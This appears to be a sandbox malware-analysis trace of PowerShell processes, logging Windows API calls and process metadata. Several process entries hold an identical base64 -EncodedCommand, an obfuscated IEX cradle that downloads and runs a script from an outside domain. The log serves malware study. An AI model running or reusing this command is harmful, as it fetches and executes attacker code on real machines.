	[0963.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0963.692] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0963.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.692] CoTaskMemFree (pv=0x1b91c0b0) 
	[0963.695] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0963.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.695] CoTaskMemFree (pv=0x1b91c0b0) 
	[0963.696] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0963.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.696] CoTaskMemFree (pv=0x1b91c0b0) 
	[0963.698] CoCreateGuid (in: pguid=0x12dce8 | out: pguid=0x12dce8*(Data1=0x4d7626a7, Data2=0xa8b7, Data3=0x49a2, Data4=([0]=0xb0, [1]=0x19, [2]=0x18, [3]=0x87, [4]=0x3f, [5]=0x13, [6]=0x49, [7]=0x7f))) returned 0x0
	[0963.701] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0963.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.701] CoTaskMemFree (pv=0x1b91c0b0) 
	[0963.704] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0963.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.704] CoTaskMemFree (pv=0x1b91c0b0) 
	[0963.707] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0963.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0963.707] CoTaskMemFree (pv=0x1b91c0b0) 
	[0963.724] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0964.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12d990 | out: lpConsoleScreenBufferInfo=0x12d990) returned 1
	[0964.212] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0964.213] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12d990 | out: lpConsoleScreenBufferInfo=0x12d990) returned 1
	[0964.216] GetCurrentProcess () returned 0xffffffffffffffff
	[0964.217] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12d9b8 | out: TokenHandle=0x12d9b8*=0xe4) returned 1
	[0964.219] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d8d8 | out: TokenInformation=0x0, ReturnLength=0x12d8d8) returned 0
	[0964.220] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2964f0
	[0964.220] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x2964f0, TokenInformationLength=0x4, ReturnLength=0x12d8d8 | out: TokenInformation=0x2964f0, ReturnLength=0x12d8d8) returned 1
	[0964.221] DuplicateTokenEx (in: hExistingToken=0xe4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12da38 | out: phNewToken=0x12da38*=0x2f0) returned 1
	[0964.222] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d8d8 | out: TokenInformation=0x0, ReturnLength=0x12d8d8) returned 0
	[0964.222] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x296520
	[0964.222] GetTokenInformation (in: TokenHandle=0xe4, TokenInformationClass=0x8, TokenInformation=0x296520, TokenInformationLength=0x4, ReturnLength=0x12d8d8 | out: TokenInformation=0x296520, ReturnLength=0x12d8d8) returned 1
	[0964.223] CheckTokenMembership (in: TokenHandle=0x2f0, SidToCheck=0x2c0bc60*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12da48 | out: IsMember=0x12da48) returned 1
	[0964.223] CloseHandle (hObject=0x2f0) returned 1
	[0964.236] CoTaskMemAlloc (cb=0x804) returned 0x1b91e080
	[0964.236] GetConsoleTitleW (in: lpConsoleTitle=0x1b91e080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0964.581] CoTaskMemFree (pv=0x1b91e080) 
	[0964.598] CoTaskMemAlloc (cb=0x804) returned 0x1b91e930
	[0964.598] GetConsoleTitleW (in: lpConsoleTitle=0x1b91e930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0964.598] CoTaskMemFree (pv=0x1b91e930) 
	[0964.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.601] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0964.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0964.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.040] SetConsoleCtrlHandler (HandlerRoutine=0x27d689c, Add=1) returned 1
	[0965.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0965.060] CoCreateGuid (in: pguid=0x12db30 | out: pguid=0x12db30*(Data1=0x8408e974, Data2=0x2dc9, Data3=0x4471, Data4=([0]=0xa1, [1]=0x6e, [2]=0x3e, [3]=0xf9, [4]=0x77, [5]=0x88, [6]=0xb9, [7]=0x22))) returned 0x0
	[0965.060] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0965.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.060] CoTaskMemFree (pv=0x1b91c0b0) 
	[0966.598] WinSqmIsOptedIn () returned 0x0
	[0966.599] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0966.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.599] CoTaskMemFree (pv=0x1b91c0b0) 
	[0966.600] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0966.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.600] CoTaskMemFree (pv=0x1b91c0b0) 
	[0967.561] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0967.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.561] CoTaskMemFree (pv=0x1b91c0b0) 
	[0967.561] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0967.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.562] CoTaskMemFree (pv=0x1b91c0b0) 
	[0967.562] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0967.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.562] CoTaskMemFree (pv=0x1b91c0b0) 
	[0968.943] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0968.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.943] CoTaskMemFree (pv=0x1b91c0b0) 
	[0968.944] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0968.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.944] CoTaskMemFree (pv=0x1b91c0b0) 
	[0968.944] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0968.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.944] CoTaskMemFree (pv=0x1b91c0b0) 
	[0968.952] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0968.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.952] CoTaskMemFree (pv=0x1b91c0b0) 
	[0970.224] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0970.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.224] CoTaskMemFree (pv=0x1b91c0b0) 
	[0970.227] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0970.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.227] CoTaskMemFree (pv=0x1b91c0b0) 
	[0970.228] CoTaskMemAlloc (cb=0x104) returned 0x1b91c0b0
	[0970.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.228] CoTaskMemFree (pv=0x1b91c0b0) 

Thread:
	id = 915
	os_tid = 0x1874


Thread:
	id = 920
	os_tid = 0x1888


Thread:
	id = 1215
	os_tid = 0x1ab0


Thread:
	id = 1218
	os_tid = 0x1ab8


Thread:
	id = 1258
	os_tid = 0x1c54


Thread:
	id = 1323
	os_tid = 0x1dec


Thread:
	id = 1571
	os_tid = 0x20f8


Thread:
	id = 1591
	os_tid = 0x2158

	[0814.541] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0893.004] RegCloseKey (hKey=0x2e8) returned 0x0
	[0893.005] RegCloseKey (hKey=0x2f0) returned 0x0
	[0893.005] RegCloseKey (hKey=0x2ec) returned 0x0

Thread:
	id = 1936
	os_tid = 0x2624


Process:
	id = "159"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3a85f000"
	os_pid = "0x164c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 837
	os_tid = 0x1664

	[0492.970] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 952
	os_tid = 0x1980


Thread:
	id = 968
	os_tid = 0x19e0


Process:
	id = "160"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3d06d000"
	os_pid = "0x11f8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 839
	os_tid = 0x16c4

	[0515.115] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 959
	os_tid = 0x19b8


Thread:
	id = 986
	os_tid = 0x1a48


Process:
	id = "161"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3fb7b000"
	os_pid = "0x1288"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 845
	os_tid = 0x12a4

	[0515.427] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 960
	os_tid = 0x19c0


Thread:
	id = 987
	os_tid = 0x1a4c


Process:
	id = "162"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x40789000"
	os_pid = "0x17b0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 859
	os_tid = 0x1740

	[0515.239] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 970
	os_tid = 0x19f0


Thread:
	id = 995
	os_tid = 0x1a80


Process:
	id = "163"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x41b98000"
	os_pid = "0xafc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 873
	os_tid = 0x153c

	[0517.034] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 980
	os_tid = 0x1a20


Thread:
	id = 1006
	os_tid = 0x1ab8


Process:
	id = "164"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x409a7000"
	os_pid = "0x10b0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 878
	os_tid = 0x16ac

	[0514.960] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 957
	os_tid = 0x19b0


Thread:
	id = 984
	os_tid = 0x1a40


Thread:
	id = 2135
	os_tid = 0x2414


Thread:
	id = 2137
	os_tid = 0x1e74


Thread:
	id = 2139
	os_tid = 0x216c


Process:
	id = "165"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x39ab3000"
	os_pid = "0x844"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 899
	os_tid = 0xc98

	[0517.082] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0829.925] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0840.412] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0840.412] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
